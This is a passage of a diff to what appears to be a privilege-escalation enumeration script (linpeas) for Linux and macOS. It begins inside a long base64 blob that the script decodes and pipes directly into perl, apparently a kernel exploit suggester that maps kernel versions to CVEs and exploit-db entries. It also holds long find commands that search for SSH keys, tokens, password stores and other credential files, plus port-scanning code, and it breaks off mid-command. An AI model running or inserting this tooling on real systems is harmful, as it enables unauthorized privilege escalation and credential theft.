MScsIAogICAgICAgICAgICAnMy4xLjgnLCAnMy4wLjUnLCAnMy4wLjQnLCAnMy4wLjInLCAnMy4wLjEnLCAnMy4yJywgJzMuMC4xJywgJzMuMCcKICAgICAgICBdLAogICAgICAgIGN2ZSA9PiAnTlxBJywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvMzgzOTAnLAogICAgfSwKICAgICdnZXRfcmVrdCcgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnNC40LjAnLCAnNC44LjAnLCAnNC4xMC4wJywgJzQuMTMuMCcKICAgICAgICBdLAogICAgICAgIGN2ZSA9PiAnMjAxNy0xNjY5NScsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzQ1MDEwJywKICAgIH0sCiAgICAnZXhwbG9pdF94JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMjInLCAnMi42LjIzJywgJzIuNi4yNCcsICcyLjYuMjUnLCAnMi42LjI2JywgJzIuNi4yNycsCiAgICAgICAgICAgICcyLjYuMjcnLCAnMi42LjI4JywgJzIuNi4yOScsICcyLjYuMzAnLCAnMi42LjMxJywgJzIuNi4zMicsCiAgICAgICAgICAgICcyLjYuMzMnLCAnMi42LjM0JywgJzIuNi4zNScsICcyLjYuMzYnLCAnMi42LjM3JywgJzIuNi4zOCcsCiAgICAgICAgICAgICcyLjYuMzknLCAnMy4wLjAnLCAgJzMuMC4xJywgICczLjAuMicsICAnMy4wLjMnLCAgJzMuMC40JywKICAgICAgICAgICAgJzMuMC41JywgICczLjAuNicsICAnMy4xLjAnLCAgJzMuMi4wJywgICczLjMuMCcsICAnMy40LjAnLAogICAgICAgICAgICAnMy41LjAnLCAgJzMuNi4wJywgICczLjcuMCcsICAnMy43LjYnLCAgJzMuOC4wJywgICczLjkuMCcsCiAgICAgICAgICAgICczLjEwLjAnLCAnMy4xMS4wJywgJzMuMTIuMCcsICczLjEzLjAnLCAnMy4xNC4wJywgJzMuMTUuMCcsCiAgICAgICAgICAgICczLjE2LjAnLCAnMy4xNy4wJywgJzMuMTguMCcsICczLjE5LjAnLCAnNC4wLjAnLCAgJzQuMS4wJywKICAgICAgICAgICAgJzQuMi4wJywgICc0LjMuMCcsICAnNC40LjAnLCAgJzQuNS4wJywgICc0LjYuMCcsICAnNC43LjAnCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTgtMTQ2NjUnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy80NTY5NycsCiAgICB9LAogICk7Cn0KCl9fRU5EX18KPWhlYWQxIE5BTUUKCmxpbnV4X2V4cGxvaXRfc3VnZ2VzdGVyLTIucGwgLSBBIGxvY2FsIGV4cGxvaXQgc3VnZ2VzdGVyIGZvciBsaW51eAoKPWhlYWQxIERFU0NSSVBUSU9OCgpUaGlzIHBlcmwgc2NyaXB0IHdpbGwgZW51bWVyYXRlIHRoZSBwb3NzaWJsZSBleHBsb2l0cyBhdmFpbGFibGUgZm9yIGEgZ2l2ZW4ga2VybmVsIHZlcnNpb24KCj1oZWFkMSBVU0FHRQoKWy1oXSBIZWxwICh0aGlzIG1lc3NhZ2UpClsta10gS2VybmVsIG51bWJlciAoZWcuIDIuNi4yOCkKWy1kXSBPcGVuIGV4cGxvaXQgZG93bmxvYWQgbWVudQoKWW91IGNhbiBhbHNvIHByb3ZpZGUgYSBwYXJ0aWFsIGtlcm5lbCB2ZXJzaW9uIChlZy4gMi40KQp0byBzZWUgYWxsIGV4cGxvaXRzIGF2YWlsYWJsZS4KCj1oZWFkMSBBVVRIT1IKCkpvbmF0aGFuIERvbmFzIChjKSAyMDE5Cgo9Y3V0Cgo9aGVhZDEgTElDRU5TRQoKIExpbnV4IEV4cGxvaXQgU3VnZ2VzdGVyIDIKCiBUaGlzIHByb2dyYW0gaXMgZnJlZSBzb2Z0d2FyZTsgeW91IGNhbiByZWRpc3RyaWJ1dGUgaXQgYW5kL29yIG1vZGlmeQogaXQgdW5kZXIgdGhlIHRlcm1zIG9mIHRoZSBHTlUgR2VuZXJhbCBQdWJsaWMgTGljZW5zZSBhcyBwdWJsaXNoZWQgYnkKIHRoZSBGcmVlIFNvZnR3YXJlIEZvdW5kYXRpb247IGVpdGhlciB2ZXJzaW9uIDIgb2YgdGhlIExpY2Vuc2UsIG9yCiAoYXQgeW91ciBvcHRpb24pIGFueSBsYXRlciB2ZXJzaW9uLgoKIFRoaXMgcHJvZ3JhbSBpcyBkaXN0cmlidXRlZCBpbiB0aGUgaG9wZSB0aGF0IGl0IHdpbGwgYmUgdXNlZnVsLAogYnV0IFdJVEhPVVQgQU5ZIFdBUlJBTlRZOyB3aXRob3V0IGV2ZW4gdGhlIGltcGxpZWQgd2FycmFudHkgb2YKIE1FUkNIQU5UQUJJTElUWSBvciBGSVRORVNTIEZPUiBBIFBBUlRJQ1VMQVIgUFVSUE9TRS4gIFNlZSB0aGUKIEdOVSBHZW5lcmFsIFB1YmxpYyBMaWNlbnNlIGZvciBtb3JlIGRldGFpbHMuCiAgICAgICAgCiBZb3Ugc2hvdWxkIGhhdmUgcmVjZWl2ZWQgYSBjb3B5IG9mIHRoZSBHTlUgR2VuZXJhbCBQdWJsaWMgTGljZW5zZSBhbG9uZwogd2l0aCB0aGlzIHByb2dyYW07IGlmIG5vdCwgd3JpdGUgdG8gdGhlIEZyZWUgU29mdHdhcmUgRm91bmRhdGlvbiwgSW5jLiwKIDUxIEZyYW5rbGluIFN0cmVldCwgRmlmdGggRmxvb3IsIEJvc3RvbiwgTUEgMDIxMTAtMTMwMSBVU0EuCgo9Y3V0Cg==" + echo $les2_b64 | base64 -d | perl + echo "" +fi + +if [ "$(command -v brew 2>/dev/null)" ]; then + print_2title "Brew Doctor Suggestions" + brew doctor + echo "" +fi + + + +#-- SY) AppArmor +print_2title "Protections" +print_list "AppArmor enabled? .............. "$NC +if [ "$(command -v aa-status 2>/dev/null)" ]; then + aa-status 2>&1 | sed "s,disabled,${SED_RED}," +elif [ "$(command -v apparmor_status 2>/dev/null)" ]; then + apparmor_status 2>&1 | sed "s,disabled,${SED_RED}," +elif [ "$(ls -d /etc/apparmor* 2>/dev/null)" ]; then + ls -d /etc/apparmor* +else + echo_not_found "AppArmor" +fi + +#-- SY) grsecurity +print_list "grsecurity present? ............ "$NC +( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity") + +#-- SY) PaX +print_list "PaX bins present? .............. "$NC +(command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX") + +#-- SY) Execshield +print_list "Execshield enabled? ............ "$NC +(grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${SED_RED}," + +#-- SY) SElinux +print_list "SELinux enabled? ............... "$NC +(sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," + +#-- SY) Gatekeeper +if [ "$MACPEAS" ]; then + print_list "Gatekeeper enabled? .......... "$NC + (spctl --status 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," + + print_list "sleepimage encrypted? ........ "$NC + (sysctl vm.swapusage | grep "encrypted" | sed "s,encrypted,${SED_GREEN},") || echo_no + + print_list "XProtect? .................... "$NC + (system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5 | grep -Iv "^$") || echo_no + + print_list "SIP enabled? ................. "$NC + csrutil status | sed "s,enabled,${SED_GREEN}," | sed "s,disabled,${SED_RED}," || echo_no + + print_list "Connected to JAMF? ........... "$NC + warn_exec jamf checkJSSConnection + + print_list "Connected to AD? ............. "$NC + dsconfigad -show && echo "" || echo_no +fi + +#-- SY) ASLR +print_list "Is ASLR enabled? ............... "$NC +ASLR=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null) +if [ -z "$ASLR" ]; then + echo_not_found "/proc/sys/kernel/randomize_va_space"; +else + if [ "$ASLR" -eq "0" ]; then printf $RED"No"$NC; else printf $GREEN"Yes"$NC; fi + echo "" +fi + +#-- SY) Printer +print_list "Printer? ....................... "$NC +(lpstat -a || system_profiler SPPrintersDataType || echo_no) 2>/dev/null + +#-- SY) Running in a virtual environment +print_list "Is this a virtual machine? ..... "$NC +hypervisorflag=$(grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor) +if [ "$(command -v systemd-detect-virt 2>/dev/null)" ]; then + detectedvirt=$(systemd-detect-virt) + if [ "$hypervisorflag" ]; then printf $RED"Yes ($detectedvirt)"$NC; else printf $GREEN"No"$NC; fi +else + if [ "$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi +fi + +fi +echo '' +echo '' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi + +if echo $CHECKS | grep -q container; then +print_title "Container" ########################################### #---------) Container functions (---------# ########################################### @@ -999,470 +1480,47 @@ checkContainerExploits() { } -########################################### -#-----------) Some Basic Info (-----------# -########################################### +############################################## +#---------------) Containers (---------------# +############################################## +containerCheck -print_title "Basic information" -printf $LG"OS: "$NC -(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED}," -printf $LG"User & Groups: "$NC -(id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$idB,${SED_RED},g" -printf $LG"Hostname: "$NC -hostname 2>/dev/null -printf $LG"Writable folder: "$NC; -echo $Wfolder -if [ "$DISCOVER_BAN_GOOD" ]; then - printf $YELLOW"[+] $DISCOVER_BAN_GOOD\n$NC" -else - printf $RED"[-] $DISCOVER_BAN_BAD\n$NC" -fi +print_2title "Container related tools present" +command -v docker +command -v lxc +command -v rkt +command -v kubectl +command -v podman +command -v runc -if [ "$SCAN_BAN_GOOD" ]; then - printf $YELLOW"[+] $SCAN_BAN_GOOD\n$NC" -else - printf $RED"[-] $SCAN_BAN_BAD\n$NC" -fi -if [ "$(command -v nmap 2>/dev/null)" ];then - NMAP_GOOD=$GREEN"nmap${BLUE} is available for network discover & port scanning, you should use it yourself" - printf $YELLOW"[+] $NMAP_GOOD\n$NC" -fi -echo "" -echo "" +print_2title "Container details" +print_list "Is this a container? ...........$NC $containerType" -########################################### -#--------) Check if network jobs (--------# -########################################### -if [ "$PORTS" ]; then - if [ "$SCAN_BAN_GOOD" ]; then - if [ "$(echo -n $PORTS | sed 's,[0-9, ],,g')" ]; then - printf $RED"[-] Err: Symbols detected in the port, for discovering purposes select only 1 port\n"$NC; - printf ${BLUE}"$HELP"$NC; - exit 0 - else - #Select the correct configuration of the netcat found - select_nc - fi - else - printf $RED" Err: Port scan not possible, any netcat in PATH\n"$NC; - printf ${BLUE}"$HELP"$NC; - exit 0 - fi -fi - -if [ "$DISCOVERY" ]; then - if [ "$PORTS" ]; then - discovery_port_scan $DISCOVERY $PORTS - else - if [ "$DISCOVER_BAN_GOOD" ]; then - discover_network $DISCOVERY - else - printf $RED" Err: Discovery not possible, no fping or ping in PATH\n"$NC; - fi - fi - exit 0 - -elif [ "$IP" ]; then - select_nc - tcp_port_scan $IP "$PORTS" - exit 0 -fi - - -if echo $CHECKS | grep -q ProCronSrvcsTmrsSocks || echo $CHECKS | grep -q IntFiles || echo $CHECKS | grep -q SofI; then - ########################################### - #----------) Caching Finds (--------------# - ########################################### - - printf $GREEN"Caching directories "$NC - - - #Get home - HOMESEARCH="/home/ /Users/ /root/ $(cat /etc/passwd 2>/dev/null | grep "sh$" | cut -d ":" -f 6 | grep -Ev "^/root|^/home|^/Users" | tr "\n" " ")" - if ! echo "$HOMESEARCH" | grep -q "$HOME" && ! echo "$HOMESEARCH" | grep -qE "^/root|^/home|^/Users"; then #If not listed and not in /home, /Users/ or /root, add current home folder - HOMESEARCH="$HOME $HOMESEARCH" - fi - GREPHOMESEARCH=$(echo "$HOMESEARCH" | sed 's/ *$//g' | tr " " "|") #Remove ending spaces before putting "|" - - CONT_THREADS=0 - # FIND ALL KNOWN INTERESTING SOFTWARE FILES - FIND_DIR_APPLICATIONS=`eval_bckgrd "find /applications -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_BIN=`eval_bckgrd "find /bin -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_CACHE=`eval_bckgrd "find /.cache -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_CDROM=`eval_bckgrd "find /cdrom -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_ETC=`eval_bckgrd "find /etc -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" -o -name \"system.d\" -o -name \"bind\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_MEDIA=`eval_bckgrd "find /media -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_MNT=`eval_bckgrd "find /mnt -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_OPT=`eval_bckgrd "find /opt -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_PRIVATE=`eval_bckgrd "find /private -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_SBIN=`eval_bckgrd "find /sbin -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_SNAP=`eval_bckgrd "find /snap -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_SRV=`eval_bckgrd "find /srv -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_TMP=`eval_bckgrd "find /tmp -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_USR=`eval_bckgrd "find /usr -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" -o -name \"bind\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_VAR=`eval_bckgrd "find /var -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" -o -name \"bind\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_APPLICATIONS=`eval_bckgrd "find /applications -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_BIN=`eval_bckgrd "find /bin -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name 